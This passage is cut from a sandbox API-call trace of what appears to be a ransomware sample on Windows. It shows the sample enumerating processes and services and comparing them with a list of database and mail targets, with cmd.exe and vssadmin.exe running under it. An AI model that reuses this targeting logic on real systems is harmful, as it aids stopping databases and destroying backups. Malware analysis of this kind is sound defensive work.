(lpString="WinHttpAutoProxySvc") returned 19 [0034.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.791] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0034.791] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0034.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0034.791] lstrlenW (lpString="Winmgmt") returned 7 [0034.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0034.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0034.792] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0034.792] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0034.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0034.792] lstrlenW (lpString="WPDBusEnum") returned 10 [0034.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.792] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0034.792] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0034.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0034.792] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x661da0 | out: hHeap=0x570000) returned 1 [0034.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0034.794] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0034.795] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0034.795] lstrlenW (lpString="System") returned 6 [0034.795] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0034.806] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0034.806] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0034.806] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0034.806] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0034.806] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0034.806] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0034.806] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0034.807] lstrlenW (lpString="smss.exe") returned 8 [0034.807] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0034.807] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0034.808] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0034.808] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0034.808] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0034.808] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0034.808] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0034.808] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.808] lstrlenW (lpString="csrss.exe") returned 9 [0034.808] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.808] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0034.808] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0034.808] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0034.808] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0034.808] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0034.808] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0034.809] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0034.809] lstrlenW (lpString="wininit.exe") returned 11 [0034.809] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0034.809] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0034.809] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0034.809] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0034.809] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0034.809] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0034.809] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0034.809] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.810] lstrlenW (lpString="csrss.exe") returned 9 [0034.810] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.810] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0034.810] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0034.810] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0034.810] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0034.810] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0034.810] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0034.811] lstrlenW (lpString="winlogon.exe") returned 12 [0034.811] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0034.812] lstrlenW (lpString="services.exe") returned 12 [0034.812] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0034.813] lstrlenW (lpString="lsass.exe") returned 9 [0034.813] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0034.814] lstrlenW (lpString="lsm.exe") returned 7 [0034.814] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.814] lstrlenW (lpString="svchost.exe") returned 11 [0034.814] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.815] lstrlenW (lpString="svchost.exe") returned 11 [0034.815] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.815] lstrlenW (lpString="svchost.exe") returned 11 [0034.815] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.816] lstrlenW (lpString="svchost.exe") returned 11 [0034.816] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.817] lstrlenW (lpString="svchost.exe") returned 11 [0034.817] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0034.818] lstrlenW (lpString="audiodg.exe") returned 11 [0034.818] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.818] lstrlenW (lpString="svchost.exe") returned 11 [0034.818] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.819] lstrlenW (lpString="svchost.exe") returned 11 [0034.819] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0034.820] lstrlenW (lpString="dwm.exe") returned 7 [0034.820] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0034.820] lstrlenW (lpString="explorer.exe") returned 12 [0034.820] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0034.821] lstrlenW (lpString="spoolsv.exe") returned 11 [0034.821] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.822] lstrlenW (lpString="taskhost.exe") returned 12 [0034.822] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.822] lstrlenW (lpString="svchost.exe") returned 11 [0034.822] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0034.823] lstrlenW (lpString="taskeng.exe") returned 11 [0034.823] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.824] lstrlenW (lpString="taskhost.exe") returned 12 [0034.824] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0034.824] lstrlenW (lpString="called.exe") returned 10 [0034.824] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0034.825] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0034.825] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0034.826] lstrlenW (lpString="analyst.exe") returned 11 [0034.826] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0034.826] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0034.826] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0035.000] lstrlenW (lpString="wages.exe") returned 9 [0035.000] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0035.001] lstrlenW (lpString="rand.exe") returned 8 [0035.001] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0035.001] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0035.001] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0035.002] lstrlenW (lpString="cottage.exe") returned 11 [0035.002] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0035.003] lstrlenW (lpString="pairs_spec.exe") returned 14 [0035.003] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0035.004] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0035.004] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0035.005] lstrlenW (lpString="observationshairy.exe") returned 21 [0035.005] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0035.005] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0035.005] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0035.006] lstrlenW (lpString="spectrum.exe") returned 12 [0035.006] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0035.007] lstrlenW (lpString="dies.exe") returned 8 [0035.007] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0035.007] lstrlenW (lpString="configured.exe") returned 14 [0035.007] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0035.008] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0035.008] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0035.009] lstrlenW (lpString="fast.exe") returned 8 [0035.009] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0035.017] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0035.017] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0035.017] lstrlenW (lpString="review.exe") returned 10 [0035.017] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0035.018] lstrlenW (lpString="historybinding.exe") returned 18 [0035.018] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0035.019] lstrlenW (lpString="pk task surge.exe") returned 17 [0035.019] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0035.019] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0035.019] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0035.020] lstrlenW (lpString="mobsync.exe") returned 11 [0035.020] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0035.021] lstrlenW (lpString="dllhost.exe") returned 11 [0035.021] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0035.022] lstrlenW (lpString="dllhost.exe") returned 11 [0035.022] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0035.022] lstrlenW (lpString="ivttvf.exe") returned 10 [0035.022] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0035.023] lstrlenW (lpString="cmd.exe") returned 7 [0035.023] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0035.024] lstrlenW (lpString="conhost.exe") returned 11 [0035.024] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0035.024] lstrlenW (lpString="vssadmin.exe") returned 12 [0035.024] Process32NextW (in: hSnapshot=0x1a0, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0035.025] CloseHandle (hObject=0x1a0) returned 1 [0035.025] Sleep (dwMilliseconds=0x1f4) [0036.045] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efb98 [0036.046] EnumServicesStatusExW (in: hSCManager=0x5efb98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0036.046] GetLastError () returned 0xea [0036.047] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11e4) returned 0x661da0 [0036.047] EnumServicesStatusExW (in: hSCManager=0x5efb98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x661da0, cbBufSize=0x11e4, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x661da0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0036.047] CloseServiceHandle (hSCObject=0x5efb98) returned 1 [0036.047] lstrlenW (lpString="Appinfo") returned 7 [0036.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0036.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0036.048] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0036.048] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0036.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0036.048] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0036.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 